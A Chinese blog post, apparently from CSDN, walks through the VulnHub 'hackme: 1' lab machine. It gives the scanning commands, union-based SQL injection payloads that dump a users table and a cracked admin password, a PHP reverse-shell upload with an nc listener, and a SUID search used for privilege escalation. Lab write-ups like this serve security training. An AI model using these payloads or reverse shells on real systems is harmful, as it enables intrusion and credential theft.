vulnhub hackme: 1

最新推荐文章于 2023-05-13 23:58:06 发布
最新推荐文章于 2023-05-13 23:58:06 发布
阅读量3k 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 suid 文件上传 sql注入 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/122888309
版权

渗透思路:

nmap扫描----->dirb和nikto扫描----->利用SQL联合注入得到superadmin账号密码----->通过文件上传漏洞获得反弹shell-----> 通过奇怪目录下有suid权限的文件提权

环境信息:

靶机:192.168.101.45

攻击机:192.168.101.34

具体步骤:

步骤1、nmap扫描

sudo nmap -sS -A -p- 192.168.101.45

nmap进行TCP全端口扫描,只扫描到22(ssh)和80(http)端口开放

步骤2、dirb和nikto扫描

dirb扫描

dirb http://192.168.101.45

扫到http://192.168.101.45/uploads/

用浏览器访问之后发现是个目录,只有一个文件,test.png

图片里也没什么内容,下载之后用strings命令查看也没什么可读字符串。

nikto扫描

nikto -host 192.168.101.45

 没扫到啥有用的东西

步骤3、利用SQL联合注入得到superadmin账号密码

浏览器访问http://192.168.101.45,发现到了一个登录页面,目前没有任何关于账号和密码的提示信息,尝试万能密码也没有成功。

但是发现有一个Sign up now链接,可以注册账号

注册好账号之后点Login here,再回到登录页面登录,登录成功之后发现一个可以通过书籍名称搜索书籍信息的页面。

不输入书籍名称直接点search按钮可以得到全部书籍信息。

根据一开始nmap扫描的结果,web服务器是apache,再根据网站中的文件都是.php,可以推测这里的数据库大概率是mysql。

看看这边有没有sql注入:

再搜索框中输入 

CISSP

得到一条结果 

 输入

CISSP' or 1=1#

得到全部书籍信息

显然是把 ' or 1=1#作为sql语句的一部分来执行了。

下面试试union注入:

首先尝试order by,结果n处不管输入什么数字都没有结果

CISSP' order by n#

没关系,直接上union select吧,这边肉眼可见的是3行,所以先试试

CISSP' union select 1,2,3#

 发现输出确实是3列,并且3列都是可见的

接下来依次输入如下payload

CISSP' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
CISSP' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()#
CISSP' union select 1,group_concat(user),group_concat(pasword) from users#

第一条可以得到当前数据库所有表名称,其中包含users表

 第二条可以得到表users所有列名称,其中包含user和pasword

 第三条可以得到users表的user和pasword列的所有值

注意到用户中有个superadmin,把它对应的密码(2386acb2cf356944177746fc92523983)拿到网上md5解密一下,得到Uncrackable

步骤4、通过文件上传漏洞获得反弹shell

退出当前用户登录,在登录页面输入用户名superadmin和密码Uncrackable,成功登录,并且页面和上一步中注册的用户的页面有所不同,是一个上传文件的页面。

尝试上传文件php-reverse.php,这个文件是kali linux上的 /usr/share/webshells/php/php-reverse-shell.php修改了$ip和$port的值之后得到的。

 

上传后提示文件上传成功,并保存在了uploads文件夹下 

访问  http://192.168.101.45/uploads/ 发现php-reverse.php确实已经上传成功

攻击机用nc监听443端口 

nc -nlvp 443

浏览器访问http://192.168.101.45/uploads/php-reverse.php

得到www-data的反弹shell

输入如下命令得到交互式shell 

python -c 'import pty; pty.spawn("/bin/bash")'

 

步骤5、 通过奇怪目录下有suid权限的文件提权

运气太好了一点,在/home目录下找找找,就找到了/home/legacy/touchmenot,这个文件有suid权限,运行之后竟然就直接获得root权限了。

其实更公式化一点,suid权限的文件可以用如下命令查找

find / -perm -u=s -type f 2>/dev/null

 

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HACKME:1靶机
JKding123的博客
10-22 938
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
Hackme1
追求卓越,技术流~
01-12 1845
文章目录前言一、搭建靶场环境二、实战2.1信息收集2.1.1网络扫描2.1.2查看靶机开放的端口22段口分析80端口分析2.2SQL注入2.2.1验证是否含有SQL注入漏洞2.2.2sqlmap注入攻击2.3文件上传漏洞2.4kali监听2.5权力提升总结 前言 学习网络安全技术,我认为:主要是在注重实战。 实践是检验真理的唯一标准 接下来主要围绕靶机的攻击进程来学习网络安全技术。 一、搭建靶场环境 攻击机kali: IP地址:192.168.247.129 靶机hackme1: IP地址:192.
vulnhub靶机hackme(DHCP)渗透测试
Long_gone的博客
12-04 1299
一、扫描 靶机打开后先用攻击机扫描靶机的IP地址: arp-scan 192.168.34.0/24 经过排除,确定靶机IP地址为:192.168.34.154,然后扫描一下靶机的端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,然后再扫描一下80端口的目录: dirb http://192.168.34.154 ...
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6287
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
Vulnhub-hackme1
GALi_233的博客
03-06 3314
Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the pos
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
打靶练习vulnhub: stapler
最新发布
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
dirb-开源
05-29
DIRB - URL Bruteforcer:DIRB 是一个 Web 内容扫描器。 它寻找隐藏的 Web 对象。 它的工作原理是对 Web 服务器发起基于字典的攻击并分析响应。 DIRB 的主要目的是帮助 Web 应用程序审计。
网站目录扫描器
06-08
很实用的一款目录扫描器,可用于查找网站的后台,上传路径、等...
hackme-1初级渗透测试
jrdh的博客
11-26 1595
Hackme-1环境搭建1. 详情2. 描述一:信息收集0x01主机发现端口扫描服务扫描服务器指纹信息查询网站目录爆破二:漏洞发现创建用户SQL注入MD5解密文件上传漏洞漏洞验证三:漏洞利用反弹shell法一: 一句话木马四:提权 环境搭建 测试机:kali:192.168.10.153 靶机:hackme-1:192.168.10.155 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初
hackme1新手教学
w2411313的博客
10-13 8168
15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。>,点击选择文件进行上传,然后点击upload image。12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking。
靶机渗透练习13-hackme1
hirak0的博客
04-15 665
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic
(Vulnhub练习)-- HACKME: 1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-06 3574
(Vulnhub练习)-- HACKME: 1渗透实战 下载地址 https://www.vulnhub.com/entry/hackme-1,330/ 扫描主机 netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.134 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null
如何利用Kali Linux进行网站渗透测试:最常用工具详解
weixin_43263566的博客
05-13 6983
Kali Linux 2022.4虚拟机中常用的渗透测试工具介绍
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1198
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub-pWnOS: 2.0 (考点; simpe php blog / sql 注入/linux提权)
冬萍子癸水
04-22 324
nmap 就80web 两种方法,一种是SQL注入,一种是利用博客漏洞 第一种 dirbuster看到有博客,这里继续信息搜集,扫blog下的内容。毕竟blog下肯定也有很多东西。。 发现这个博客叫simple php blog page info 看到是0.4.0 搜漏洞 打它 perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -...
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值